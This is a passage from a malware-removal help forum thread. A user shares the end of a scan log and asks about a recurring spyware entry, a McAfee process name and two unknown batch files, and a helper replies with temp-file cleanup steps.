Scanning Hosts file......
Hosts file location:"C:\WINDOWS\system32\drivers\etc\hosts".
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Hosts file scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
1 entries scanned.
New critical objects:0
Objects found so far: 41

Performing conditional scans...
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Conditional scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 0
Objects found so far: 41

1:12:45 AM Scan Complete

**********************************************

Note that SinstantM shows on the Adaware scan (process #49). I deleted that BEFORE I ran that scan, and did it from Safe Mode. It somehow came back, I deleted it again, it came back again and showed in the HJT scan I did right before I posted this. I checked it and clicked "Fix", and it went bubeye, not showing in the scan I pasted into this message. I hope it's gone forever this time...

I can't thank you enough for your help. This day was pretty much a total loss as far as work was concerned, but I have a feeling that there won't be many more of these days after what I've learned from today's little adventure.

Take care, and keep doin what you're doin... There aren't enough folks in the world like the guys in this forum...

Matt

GnarlyCar

A couple other things I wanted to mention...

Once, during one of the many reboots I did over the course of the day yesterday, I was shutting down and a bunch of programs were not responding, showing error messages with the "End Now" button, and one of those programs was called "##VSO###MCUHSSHLD##". I tried searching for that later, but found nothing. Is that some kind of abbreviation for a legitimate program, or is something actually called that within one of the spyware instances that I got rid of?

Also, I found two batch files that I wasn't too sure of:

r.bat, which was in C:\Docs&Set\Matt\Local Settings\Temp

I've since put it in a quarantine folder there...

x.bat, I can't remember where this one was...

Any ideas?

Thanks again,
Matt

Buckeye_Sam

##VSO###MCUHSSHLD##

This is related to McAfee antivirus. Are you still getting these errors? Is your antivirus loading up and running ok?


Delete temp files

Navigate to the C:\Windows\Temp folder. Open the Temp folder and go to Edit > Select All then Edit > Delete to delete the entire contents of the Temp folder.

Navigate to the C:\Windows\Prefetch folder. Open the Prefetch folder and go to Edit > Select All then Edit > Delete to delete the entire contents of the Prefetch folder.

Go to Start > Run and type %temp% in the Run box. The Temp folder will open. Click Edit > Select All then Edit > Delete to delete the entire contents of the Temp folder.

Finally go to Control Panel > Internet Options. On the General tab under "Temporary Internet Files" Click "Delete Files". Put a check by "Delete Offline Content" and click OK. Click on the Programs tab then click the "Reset Web Settings" button. Click Apply then OK.

Empty the Recycle Bin.



Your log looks clean to me, but let me know how things are working on your end.